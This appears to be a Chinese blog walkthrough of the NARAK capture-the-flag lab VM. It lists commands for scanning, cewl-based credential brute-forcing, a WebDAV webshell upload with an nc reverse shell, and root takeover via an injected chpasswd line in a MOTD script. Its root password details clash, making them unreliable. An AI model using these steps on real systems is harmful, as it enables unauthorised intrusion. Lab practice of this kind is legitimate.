靶机:NARAK

kali : 192.168.71.128

靶机 :192.168.71.129

渗透流程:

  1. 探测靶机ip地址

命令:fping -aqg 192.168.71.0/24

2. nmap进行靶机端口服务扫描

命令:nmap -sC -sV 192.168.71.129 -n -vv -min-rate=2000

3.进行web页面登录

通过查看网页源码,可见没有什么可以利用的

目录扫描

使用kali中的dirb工具进行目录扫描:

命令: dirb http://192.168.71.129

通过扫描后,查看发现了有一个webdav目录。

192.168.71.129/webdav

然后去访问这个目录试试,发现需要用户名密码登录。

这时,我们使用kali 下的cewl 字典生成工具 爬取该页面存在的密码,生成一个password.txt 文件。

命令:cewl 192.168.71.129 -w password.txt

密码本爆破

账号: yamdoot

密码: Swarg

上传webshell.php

命令:put webshell.php

上传成功之后,需要访问192.168.71.129建立反向连接,访问网站之前开启监听,监听命方法如下:nc -lvvp 4444

重新去访问:192.168.71.129/webdav ,点击刚刚上传的 webshell.php

看到如下情况说明成功回弹webshell

通过python进行交互:

python3 -c  ‘import pty;pty.spawn(“/bin/bash”)’

注:这里的引号都是需要英文状态下输入

可以看到home下有三个用户:inferno narakyamdoot

发现了/mnt 目录下 的 hell.sh 文件

通过 登录 BF 在线解码

网址:https://www.splitbrain.org/services/ook

通过点击 Brainfuck to Text 进行解码得到 chitragupt

依次使用home家目录下的用户名,以及BF解码后的密码进行提权;

用户名:inferno

密码为:chitragupt

当尝试到切换到 用户名为 inferno  进行su 提权 时可以成功登录

ls 发现user.txt文件

cat查看txt文件,得到Flag;

5. 提权:

修改00-header

echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header

退出重新登录,su root刚刚更改的密码:

su - root

password:justice

narak 靶机实验实战演练相关推荐

  1. Thoth-Tech靶机实验实战演练

    一.明确目标 # UBUNTU 靶机获取不到ip的小技巧: nano /etc/netplan/00-installer-config.yaml 配置文件目录下  使用 Nano 更改网络配置 改成e ...

  2. Gaara靶机实验实战演练

    一.确定目标 实验环境 VMware Workstation  Xshell 靶机ip :  192.168.119.147 Kali ip :   192.168.119.129 二.信息搜集 Nm ...

  3. recon靶机实验实战演练

    一.明确目标 靶机ip 192.168.119.150 Kali ip 192.168.119.129 二.信息搜集 Nmap 搜集端口信息 访问80端口 使用direarch搜集目录信息 常见状态码 ...

  4. lampiao靶机实验实战演练

    一.明确目标 探测主机存活情况 靶机 ip : 192.168.119.155 Kali  ip :192.168.119.129 二.信息搜集 Nmap 进行常规端口开放扫描 开放了22 ssh 8 ...

  5. m87靶机实验实战演练

    一.明确目标 Kali: ip 192.168.119.129 靶机:ip 192.168.119.146 二.信息搜集 端口扫描:nmap 192.168.119.146 开放了22.80.9090 ...

  6. 渗透测试实例,xampp靶机实验

    实验名称:渗透测试实例,xampp靶机实验 实验目的:对xampp靶机进行渗透测试 实验环境:Kali虚拟机一台4G xampp靶机一台 IP:192.168.22.128 实验步骤: 一.对靶机进行 ...

  7. 搭建kali和win xp靶机实验环境

    1.下载并安装VMware workstation 16.自行百度密钥. 2.安装kali linux系统,桥接模式,设置IP地址. 从kali官网下载(https://www.kali.org/ge ...

  8. 从外网Thinkphp3日志泄露到杀入内网域控 - 红队攻击之域内靶机渗透实战演练

    1.简要描述 这个工具写完有一段时间了,看网上目前还没有一个thinkphp的漏洞集成检测工具,所以打算开源出来. 2.代码结构 插件化思想,所有的检测插件都plugins目录里,TPscan.py主 ...

  9. 从入门到入土:Nessus出击:使用nessus扫描某台靶机

    此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...

最新文章

  1. 清华大学:2021元宇宙研究报告!
  2. 火遍AI圈的万字长文,Lecun却说“标题太好笑,作者发推宣战:欢迎来辩!
  3. Raw264.7培养经验分享
  4. 解决:EXCEL复制粘贴,精度丢失
  5. Eclipse使用SVN
  6. 考研计算机专业课统考吗,09考研计算机专业课统考增至4部分内容
  7. mybatis typehandler
  8. python文件按行读取变为嵌套列表_迭代两个嵌套的2D列表,其中list2具有list1的行号...
  9. iPhone6s用户感动!升级ios13还能再战两年
  10. JadClipse反编译工具在MyEclipse中的安装(先看Eclipse的配置方式)
  11. 如何化身BAT面试收割机?都是精髓!
  12. bool类型头文件_C++ Primer Chapter2 变量和基本类型
  13. 一系列JavaScript的基础工具
  14. 【Matlab数学建模】层次分析法
  15. JAVA调用 TSC 打印机 打印中文问题/JNA中文乱码
  16. 微信联系人一键导出的方法在这里
  17. setup factory 会话变量
  18. MSF利用pcshare控住目标主机
  19. 降低技术应用门槛,易现推动“AR+”迈上新台阶
  20. 3D打印无人机等无人设备6——谈一谈从设计到实践的分分合合,模型如何合并与拆分?

热门文章

  1. 数字调制解调—2ASK
  2. 怎么编辑PDF文件?分享三种好用的编辑方法
  3. 新闻推荐--从DKN出发
  4. 复制文本到word中时产生底色的去除方法
  5. Linux学习之错误与解决记录(持续更新)
  6. websocket访问ServletAPI
  7. 2022年自考专业考试(英语)英语翻译练习题
  8. pkpm板按弹性计算还是塑性_请教:筏板是按弹性算法?还是塑性算法?那个好些?...
  9. python提取微信聊天语音_利用Python进行微信,QQ的语音识别!内部技术的延伸版!...
  10. Ardunio开发实例-MAX30102脉搏血氧饱和度和心率监测传感器